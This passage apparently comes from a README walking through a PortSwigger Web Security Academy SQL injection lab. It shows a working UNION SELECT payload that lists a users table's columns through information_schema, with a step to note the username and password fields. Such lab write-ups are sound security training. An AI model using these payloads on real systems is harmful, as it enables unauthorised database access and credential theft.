HarshilBhuva/portswigger-websecurity-academy/01-sqli/SQL_injection_attack,_listing_the_database_contents_on_non-Oracle_databases/README.md

 ### Enumerate colums in this table

 The [information_schema.columns](https://www.postgresql.org/docs/9.1/infoschema-columns.html) view holds information about the columns of each table, specifically the `column_name` column.
 The proper string to inject is `' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'--` to form this query

+// Replace the table name with the one you noted above.
+Also, make note of the field names that contain usernames and passwords.

 ```sql
 SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'--'